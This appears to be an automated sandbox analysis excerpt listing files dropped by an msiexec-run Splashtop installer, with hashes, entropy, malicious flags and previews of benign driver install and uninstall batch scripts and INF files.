                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55112
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.95804253448452
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+EmCoFSZSI9Xhq7xYQAucXy069A3hKhy06ia3hyKb3LCxLVNe9zLuX:+EmPFSYWXf69A3hK16x3hyKbOnNazSX
                                                                                                                                                                                                                                                                                                                                  MD5:9D62CBDE4079B1BE2CB1B91BDD74E539
                                                                                                                                                                                                                                                                                                                                  SHA1:C54E743DE54B9D1D35CDA8F15562483163A064C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:63347E07C934A788F5996EF91D86F718C273DB6221BF448F0659F70194A65031
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3DE199BAABCB087A07071D67F2A0EE3E0F01E06B23B75B6FDCF1146CE782263E1A63D32B4DAFF3699766FD3922AB41F9DCB4497398DB5F0DA9EA33F5FDDF24C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):62816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.690155437787919
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:7FkBLAYEMVmkPGsfD6ppH3hLW6G3heObqQyvzP:75YskPGiDaphWqOuQyvr
                                                                                                                                                                                                                                                                                                                                  MD5:9CE89A1A93E196AA261561B1E5C3AFC6
                                                                                                                                                                                                                                                                                                                                  SHA1:8ECDB82C1C4A9C4431826097EDB11718152AD7A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:CBB084056495566BFC8D933D7094694053ADDB91C190F95F791016CF6368D94D
                                                                                                                                                                                                                                                                                                                                  SHA-512:A4E7E93819CDCFDF0ED468F0138AD2774D2D7D8A587A01A4745F61AC27DFCD41A49922827E7029FC7564DF3866C64464B7B131CEBF3D39AD85D94E533AE53C5B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.794885910225241
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9RNIgm9MOdELVb4NMD7:EWZ9dAudm95dyE239nd9RGpDdwh7
                                                                                                                                                                                                                                                                                                                                  MD5:1690361AD6F64AA935F0C71847F763B6
                                                                                                                                                                                                                                                                                                                                  SHA1:5F8682A46B5A4DF1F03D8078240F6619B0C90DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CBA410A986FD863C69BDB98311A2F49E04F3ED7C1499C6A5557B7BA856B5AE
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CE17EEF081E5C7F68E7584413C65242A1CE240B23F1226906DB6F6BC12E97B834545DA6B43BE5903D6EDBC66B1899634D9115E6688961F5547297819989D2EE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon.exe install stvad.inf *STVAD >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864786270026779
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9RNIgm9MOdRL6Vb4NMD7:kWZ9dAudE95d0E239Jd9RGpDdCh7
                                                                                                                                                                                                                                                                                                                                  MD5:678C5FB9E1F87E4986E2B80B55740A9C
                                                                                                                                                                                                                                                                                                                                  SHA1:3E30F2B668EEAE7F8D0A192F6F3B9EE6213D58E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E04797F8F85EAAB68DA60C9E2F08E224DBF379ECC6085BD2A8C79974FF1D46E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6FD46FE165ACB6169056465248078B9794669846B57E616F8DB923C6EDD324A625BE968E499463BADC7B99660A8CE3304333BA9D92D8907C98C6B3CB6B7DB6E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon64.exe install stvad.inf *STVAD >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11950
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.350152493437532
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mgQzOQtQyQHOQqQWNJCHF1agjEwOXP6hYCe68JGlD/Jn9VOMbSX01k9z3AoXSkqr:INg/k6h3e1GlD/LVNSR9zrVqr
                                                                                                                                                                                                                                                                                                                                  MD5:6E88194D307CE842B43826CA7B473411
                                                                                                                                                                                                                                                                                                                                  SHA1:1C8767D498A53C6287EA89BCEB43A21C4F4AF479
                                                                                                                                                                                                                                                                                                                                  SHA-256:E75BF820E72813D3C46D11502267B3FE445E9A7F05E855DF97811D3E2333EE3A
                                                                                                                                                                                                                                                                                                                                  SHA-512:016B756C585648B0AF746E906302FC021516B0419DBD9B5444B11C709D3C6AE8CF330A1A49D7ACD341846D558FDC18C1DE5B97DA59ED53C887A854B8BDA5679F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4338
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5192534972153515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:2kSMHhlJjFdN5JHzI8LeTMdH33I8vV4xmzAchZ8MMCuj:2kSMHdxdnJHTeT+3B4xm09j
                                                                                                                                                                                                                                                                                                                                  MD5:8E91B0F01FFE8DF22050392F91D8F28D
                                                                                                                                                                                                                                                                                                                                  SHA1:1ECD2875D29F0F6DE62C1DBA4535D7496846B70D
                                                                                                                                                                                                                                                                                                                                  SHA-256:946AE6ACA55B363D7550415372A8A483BEDA152920104EE4675DD4AC2169ECA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B421B323084E851154C15E22769BDBA12C555DD8DF949B21719CF13C0549EEE1AC48C4EC4802EC08A725A4515C449BACE6E43F0DC67B54BAB1DB08D2408AA59
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature..= "$CHICAGO$"..Class...= MEDIA..Provider..= %ST%..ClassGUID..= {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer = 02/14/2022,1.0.3.0..CatalogFile .= stvad.cat....[SourceDisksNames.x86]..222 = "STVAD Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVAD Driver Disk","",222,\64bits....[SourceDisksFiles]..stvad.sys = 222....;;This syntax is only recognized on Windows XP and above- it is needed to install 64-bit drivers on..;;Windows Server 2003 Service Pack 1 and above.....[Manufacturer]..%MfgName% = SplashtopDS, NTAMD64, NTx86....;; For Windows Server 2003 Service Pack 1 and above, a 64-bit OS will not install a driver..;; unless the Manufacturer and Models Sections explicitly show it is a driver for that platform..;; But the individual model section decorations (or lack thereof) work as they always have...;; All of the model sections referred to are undecorated or NT-decorated, hence work on all platforms....[SplashtopDS]..%STVAD.DeviceDesc% =
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):206
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.79285514077006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9R7:kWZ9dAudm95dyE239nd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:9EAFE2CC76D906E1C4F0FCB2A485A453
                                                                                                                                                                                                                                                                                                                                  SHA1:51D48B136B7AD1BBA162D3674F249A6832F9B55E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C01560D63FA71D8492B5B866E02902EA5AD8DF54B5678DCA54160F787AD7BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:76D1A89F064AD7C9B89D9FBD06735837E4B47220F2B790B2BE3DCC63251923F7D0B2B8DB5B3983D4E7B94DA1DFCB3EC9EC81C0927446E05D4EECA9CD293CE4F8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.871313263028117
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9R7:kWZ9dAudE95d0E239Jd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:A2DA78EF1F7BC59138D71F85D6310ECA
                                                                                                                                                                                                                                                                                                                                  SHA1:912DCBFF74495F0235A969BCE934B421086DD175
                                                                                                                                                                                                                                                                                                                                  SHA-256:A980C2CD38F4D2F06E6A5DC96BFFFB8EC39A7A1254D5FF6ED1E7F44048F66AE1
                                                                                                                                                                                                                                                                                                                                  SHA-512:32DAD786E55680F653F7F5570189E2C0F815CE0A69221B91743B67407587E9A13C414E5ECCEB2CD02A3C0A805E3D6D2639948DD22DFAC3B6FF56D74CC468AD56
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.720475524234058
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:G9CoFe+yIPYhqU1YQ7YemerV3hvrOyk3hH63:G9PFe3VYq3hvrOX3hH+
                                                                                                                                                                                                                                                                                                                                  MD5:A9D239E41BAED5879255923481C73D11
                                                                                                                                                                                                                                                                                                                                  SHA1:FE581685174CEFCAD994BB8EC1A70537BB8CA626
                                                                                                                                                                                                                                                                                                                                  SHA-256:5118FB2A6A4B1E37AA12544E5864B77733739FB5EFBC4997F3A5A3EF385FE9B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:5460CDDD61A79C9C4982106344F4354E55C93AC996EF7315DE635F2F45EFE8A9BDFF37664137E7307E8C9654BCD16ACC65B8471D08E09DAA798502B0973E3DAD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.411029825578745
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HD4P58VeNfba5EMjxMXOkvmWvwDtmmEfdgA5lER3hjgxW3hyB:8PiVeNYEMVz4TVRl+3hjgg3hyB
                                                                                                                                                                                                                                                                                                                                  MD5:E623E53FAE062F43180174FA01E7B6E0
                                                                                                                                                                                                                                                                                                                                  SHA1:7843125E12A3DF5A9DC1FB052CCC34B993A18F00
                                                                                                                                                                                                                                                                                                                                  SHA-256:D68E13044485D730E183449E3F34D45E319199D376C7528FC8DDA87CA5A22034
                                                                                                                                                                                                                                                                                                                                  SHA-512:26E342BC8E28CB447BF4F1FC4F1A7A0CA2186B4AC78CDC062B29CC206ED1FAC2E0825748DF26AA0E893795820A77D6D269F4DFCB2162E5877710D7DE8FD1365B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.794885910225241
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9RNIgm9MOdELVb4NMD7:EWZ9dAudm95dyE239nd9RGpDdwh7
                                                                                                                                                                                                                                                                                                                                  MD5:1690361AD6F64AA935F0C71847F763B6
                                                                                                                                                                                                                                                                                                                                  SHA1:5F8682A46B5A4DF1F03D8078240F6619B0C90DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CBA410A986FD863C69BDB98311A2F49E04F3ED7C1499C6A5557B7BA856B5AE
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CE17EEF081E5C7F68E7584413C65242A1CE240B23F1226906DB6F6BC12E97B834545DA6B43BE5903D6EDBC66B1899634D9115E6688961F5547297819989D2EE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon.exe install stvad.inf *STVAD >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864786270026779
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9RNIgm9MOdRL6Vb4NMD7:kWZ9dAudE95d0E239Jd9RGpDdCh7
                                                                                                                                                                                                                                                                                                                                  MD5:678C5FB9E1F87E4986E2B80B55740A9C
                                                                                                                                                                                                                                                                                                                                  SHA1:3E30F2B668EEAE7F8D0A192F6F3B9EE6213D58E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E04797F8F85EAAB68DA60C9E2F08E224DBF379ECC6085BD2A8C79974FF1D46E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6FD46FE165ACB6169056465248078B9794669846B57E616F8DB923C6EDD324A625BE968E499463BADC7B99660A8CE3304333BA9D92D8907C98C6B3CB6B7DB6E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon64.exe install stvad.inf *STVAD >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18540
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.313988713784432
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:1+wARK7Nm4UB1LtL8JN77hh/onRK7Nm4UxY28JN77hh07V:8wUh23hRoR83hGV
                                                                                                                                                                                                                                                                                                                                  MD5:52973E06C8A2587300797DEBD419A08C
                                                                                                                                                                                                                                                                                                                                  SHA1:8D13082BEEF0B4240B67F7D04809A25C8CC3834F
                                                                                                                                                                                                                                                                                                                                  SHA-256:AACA5F16D57F7C9CBA15F8420FA57CB0F222F3FD28051FD1C103AEBEBA681D05
                                                                                                                                                                                                                                                                                                                                  SHA-512:60CE0E47DD5B42DB77BBF507AEB939CA26ECA50A5A6F5FF4731D4E65230335BC5F8E47A1B60466B6BB2CACB582F7F0BEACEAA956A2A50D5C5645F0591D4DF8B0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3217
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.702969738113695
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:2kQG735yUI8LeHdT3I8vV4xDKKr84QM5MFgWCwj:2kQG7pyye1B4x+I8pj
                                                                                                                                                                                                                                                                                                                                  MD5:1574CF3E123B96142ACF789F852119FF
                                                                                                                                                                                                                                                                                                                                  SHA1:8781B4C061945A2E8E010EF129859BD1AA313C75
                                                                                                                                                                                                                                                                                                                                  SHA-256:3FF183B875687A9A2BAF0FBEFA52AC04CD5E869E6E4FD535CC7D1D1F4825A003
                                                                                                                                                                                                                                                                                                                                  SHA-512:29EA441281BA5A4E7B427335E36D0D6FA2A103D852DD16E460C4BE62E2640AE2117C1C64CFE6BFDC2A22FE9ADDE71B74DB5A1A6BF80D7BE0953FD593401F0311
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature..= "$CHICAGO$"..Class...= MEDIA..Provider..= %ST%..ClassGUID..= {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer ..= 09/16/2021, 1.0.2.0..CatalogFile .= stvad.cat....[DestinationDirs]..STVAD.CopyList = 10,system32\drivers....[SourceDisksNames.x86]..222 = "STVAD Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVAD Driver Disk","",222,\64bits....[SourceDisksFiles]..stvad.sys = 222....[Manufacturer]..%MfgName% = Splashtop, NTAMD64, NTx86....[Splashtop.NTAMD64]..%stvad.DeviceDesc% = STVAD, *STVAD....[Splashtop.NTx86]..%stvad.DeviceDesc% = STVAD, *STVAD....[STVAD]..AlsoInstall..= ks.registration(ks.inf),wdmaudio.registration(wdmaudio.inf)..CopyFiles..= STVAD.CopyList..AddReg...= STVAD.AddReg....[STVAD.CopyList]..stvad.sys....[STVAD.Interfaces]..AddInterface.= %KSCATEGORY_AUDIO%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATEGORY_RENDER%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATEGORY_CAPTURE%,%KSNAME_Wave%,STVAD.I.Wave..AddInterface.= %KSCATE
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):206
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.79285514077006
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9R7:kWZ9dAudm95dyE239nd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:9EAFE2CC76D906E1C4F0FCB2A485A453
                                                                                                                                                                                                                                                                                                                                  SHA1:51D48B136B7AD1BBA162D3674F249A6832F9B55E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9C01560D63FA71D8492B5B866E02902EA5AD8DF54B5678DCA54160F787AD7BC2
                                                                                                                                                                                                                                                                                                                                  SHA-512:76D1A89F064AD7C9B89D9FBD06735837E4B47220F2B790B2BE3DCC63251923F7D0B2B8DB5B3983D4E7B94DA1DFCB3EC9EC81C0927446E05D4EECA9CD293CE4F8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.871313263028117
